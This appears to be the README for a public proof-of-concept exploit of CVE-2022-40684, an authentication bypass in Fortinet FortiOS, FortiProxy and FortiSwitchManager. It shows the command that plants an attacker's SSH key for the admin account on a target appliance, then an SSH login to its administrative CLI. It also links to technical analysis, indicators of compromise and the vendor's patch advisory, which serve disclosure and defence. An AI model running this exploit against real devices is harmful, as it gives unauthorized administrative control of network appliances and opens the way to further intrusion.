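A POC for CVE-2022-40684, which affects Fortinet FortiOS, FortiProxy, and FortiSwitchManager appliances.
A technical root cause analysis of the vulnerability can be found on our blog: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684
To analyze Fortinet logs for indicators of compromise, and to learn how to enable more detailed logging, see our IOC blog: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
This POC abuses the authentication bypass vulnerability to set an SSH key for the specified user.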
[email protected]kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
[email protected]kali:~# ssh admin@10.0.40.67
fortios_7_2_1 #
config      Configure object.
get         Get dynamic and system information.
show        Show configuration.
diagnose    Diagnose facility.
execute     Execute static commands.
alias       Execute alias commands.
exit        Exit the CLI
Update to the latest version, or mitigate by following the instructions in the Fortinet PSIRT advisory:
https://www.fortiguard.com/psirt/FG-IR-22-377
Project page: https://github.com/horizon3ai/CVE-2022-40684